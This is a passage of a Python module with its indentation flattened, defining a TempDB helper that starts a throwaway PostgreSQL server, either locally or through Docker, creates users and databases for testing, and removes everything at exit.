FALLBACK_DOCKER_IMG = 'postgres'
DEFAULT_POSTGRES = 'postgres'
DEFAULT_INITDB = 'initdb'
DEFAULT_PSQL = 'psql'
DEFAULT_CREATEUSER = 'createuser'
def flatten(listOfLists):
return itertools.chain.from_iterable(listOfLists)
def init_temp_db(*args, **kwargs):
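# Module-level helper: lazily create the TempDB singleton and register cleanup() to run at interpreter exit.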
global temp_db
if not temp_db:
temp_db = TempDB(*args, **kwargs)
atexit.register(cleanup)
return temp_db
def cleanup():
if not temp_db:
return
temp_db.cleanup()
class PGSetupError(Exception):
pass
class TempDB(object):
def __init__(self,
databases=None,
verbosity=1,
retry=5,
tincr=1.0,
docker_img=None,
initdb=DEFAULT_INITDB,
postgres=DEFAULT_POSTGRES,
psql=DEFAULT_PSQL,
createuser=DEFAULT_CREATEUSER,
dirname=None,
sock_dir=None,
options=None):
"""Initialize a temporary Postgres database
:param databases: list of databases to create
:param verbosity: verbosity level, larger values are more verbose
:param retry: number of times to retry a connection
:param tincr: how much time to wait between retries
:param docker_img: specify a docker image for postgres
:param initdb: path to `initdb`, defaults to first in $PATH
:param postgres: path to `postgres`, defaults to first in $PATH
:param psql: path to `psql`, defaults to first in $PATH
:param createuser: path to `createuser`, defaults to first in $PATH
:param dirname: override temp data directory generation and create the
db in `dirname`
:param sock_dir: specify the postgres socket directory
:param options: a dictionary of configuration params and values
passed to `postgres` with `-c`
"""
self.verbosity = verbosity
self.docker_prefix = None
self.docker_container = None
self.docker_img = docker_img
# check for a postgres install, or fallback to docker
self._get_docker_fallback(postgres)
self.pg_process = None
# we won't expose this yet
self.run_as = self._get_run_as_account(None)
self.current_user = pwd.getpwuid(os.geteuid()).pw_name
options = dict() if not options else options
self._setup(databases, retry, tincr, initdb, postgres, sock_dir,
psql, createuser, dirname, options)
def _get_docker_fallback(self, postgres_exe):
if self.docker_img:
# already using docker
return
if postgres_exe != DEFAULT_POSTGRES:
# exe was specified explicitly so don't use a fallback
return
if not shutil.which(DEFAULT_POSTGRES):
has_docker = shutil.which(DEFAULT_DOCKER_EXE)
if not has_docker:
raise PGSetupError("Unable to locate a postgres installation")
warnings.warn("Unable to locate a postgres install. "
"Attempting fallback to docker...")
self.docker_img = FALLBACK_DOCKER_IMG
def _setup_docker_prefix(self, *args, mode='init'):
if mode == 'init':
self.docker_prefix = [DEFAULT_DOCKER_EXE, 'run', '--rm', '-e',
'POSTGRES_HOST_AUTH_METHOD=trust',
'--user=postgres']
elif mode == 'exec':
self.docker_prefix = [DEFAULT_DOCKER_EXE,
'exec', '--user=postgres', *args]
def _get_run_as_account(self, run_as):
if run_as:
try:
return pwd.getpwnam(run_as)
except KeyError:
raise PGSetupError("Can't locate user {}!".format(run_as,))
current_euid = os.geteuid()
if current_euid == 0:
# If running as root, try to run the db server creation as postgres
# user (assumed to exist)
try:
return pwd.getpwnam('postgres')
except KeyError:
raise PGSetupError("Can't create DB server as root, and "
"there's no postgres user!")
return None
@contextmanager
def _do_run_as(self):
if not self.run_as:
yield
return
current_euid = os.geteuid()
current_egid = os.getegid()
try:
os.setegid(self.run_as.pw_gid)
os.seteuid(self.run_as.pw_uid)
yield
finally:
os.seteuid(current_euid)
os.setegid(current_egid)
def _user_subshell(self, cmd):
# Note: we can't just seteuid because the postgres server process
# checks that euid == uid and that euid is not 0
# http://doxygen.postgresql.org/main_8c.html#a0bd2ee2e17615192912a97c16f908ac2
# and, if we set both uid and euid to non-zero, we won't be able to
# switch back. Instead we must run in a child process with both uid and
# euid set -- hence, `su`.
if not self.run_as:
return cmd
return ['su', '-', 'postgres', '-c',
' '.join(shlex.quote(c) for c in cmd)]
def stdout(self, level):
"""Return file handle for stdout for the current verbosity"""
if level > self.verbosity:
return subprocess.DEVNULL
else:
return sys.stdout
def stderr(self, level):
"""Return file handle for stderr for the current verbosity"""
if level > self.verbosity:
return subprocess.DEVNULL
else:
return sys.stderr
def printf(self, msg, level=1):
if level > self.verbosity:
return
print(msg)
def run_cmd(self, cmd, level=0, bg=False):
if self.docker_prefix:
cmd = self.docker_prefix + cmd
else:
cmd = self._user_subshell(cmd)
self.printf("Running %s" % str(' '.join(cmd)))
p = subprocess.Popen(cmd, stdout=self.stdout(level),
stderr=self.stderr(level))
if bg:
return p
p.communicate()
return p.returncode == 0
def _setup(self, databases, retry, tincr, initdb, postgres, sock_dir,
psql, createuser, dirname, options):
databases = databases or []
try:
self.printf("Creating temp PG server...")
with self._do_run_as():
self._setup_directories(dirname, sock_dir)
if self.docker_img:
self._setup_docker_prefix(mode='init')
self.create_db_server(initdb, postgres, options)
if self.docker_img:
self._setup_docker_prefix(self.docker_container, mode='exec')
self._real_pg_socket_dir = self.pg_socket_dir
self.pg_socket_dir = DOCKER_INTERNAL_SOCK_DIR
self.test_connection(psql, retry, tincr)
self.create_user(createuser)
self.create_databases(psql, databases)
if self.docker_img:
self.pg_socket_dir = self._real_pg_socket_dir
self.printf("done")
self.printf("(Connect on: `psql -h %s`)" % self.pg_socket_dir)
except Exception:
self.cleanup()
raise
def _setup_directories(self, dirname, sock_dir):
self.pg_temp_dir = None
if not dirname:
self.pg_temp_dir = tempfile.mkdtemp(prefix='pg_tmp_')
dirname = self.pg_temp_dir
self.pg_data_dir = os.path.join(dirname, 'data')
os.mkdir(self.pg_data_dir)
if not sock_dir:
self.pg_socket_dir = os.path.join(dirname, 'socket')
os.mkdir(self.pg_socket_dir)
# this is mainly needed in the case of docker so that the docker
# image's internal postgres user has write access to the socket dir
os.chmod(self.pg_socket_dir, 0o777)
else:
self.pg_socket_dir = sock_dir
def create_db_server(self, initdb, postgres, options):
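# Local mode: run initdb, then start postgres as a background child process.
# Docker mode: skip initdb (the image is expected to initialise the cluster itself) and
# bind-mount the socket directory into the container at DOCKER_INTERNAL_SOCK_DIR.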
if not self.docker_prefix:
rc = self.run_cmd([initdb, self.pg_data_dir], level=2)
if not rc:
raise PGSetupError("Couldn't initialize temp PG data dir")
options = ['%s=%s' % (k, v) for (k, v) in options.items()]
if self.docker_prefix:
_, cidfile = tempfile.mkstemp()
os.unlink(cidfile)
cmd = ['-d', '--cidfile', cidfile,
'-v', self.pg_socket_dir + ':' + DOCKER_INTERNAL_SOCK_DIR,
self.docker_img,
postgres, '-F', '-T', '-h', '']
bg = False
else:
cmd = [postgres, '-F', '-T', '-D', self.pg_data_dir,
'-k', self.pg_socket_dir, '-h', '']
bg = True
cmd += flatten(zip(itertools.repeat('-c'), options))
self.pg_process = self.run_cmd(cmd, level=2, bg=bg)
if self.docker_prefix:
with open(cidfile) as f:
self.docker_container = f.read()
os.unlink(cidfile)
def test_connection(self, psql, retry, tincr):
# test connection
cmd = [psql, '-d', 'postgres', '-h', self.pg_socket_dir, '-c', r"\dt"]
for i in range(retry):
time.sleep(tincr)
rc = self.run_cmd(cmd, level=2)
if rc:
break
else:
raise PGSetupError("Couldn't start PG server")
return rc
def create_user(self, createuser):
cmd = [createuser, '-h', self.pg_socket_dir, self.current_user, '-s']
rc = self.run_cmd(cmd, level=2)
if not rc:
# maybe the user already exists, and that's ok
pass
return rc
def create_databases(self, psql, databases):
rc = True
for db in databases:
cmd = [psql, '-d', 'postgres', '-h', self.pg_socket_dir,
'-c', "create database %s;" % db]
rc = rc and self.run_cmd(cmd, level=2)
if not rc:
raise PGSetupError("Couldn't create databases")
return rc
def cleanup(self):
if self.docker_container:
subprocess.run([DEFAULT_DOCKER_EXE, 'kill', self.docker_container],
stdout=subprocess.DEVNULL)
elif self.pg_process:
self.pg_process.kill()
self.pg_process.wait()
for d in [self.pg_temp_dir]:
if d:
shutil.rmtree(d, ignore_errors=True)
``` |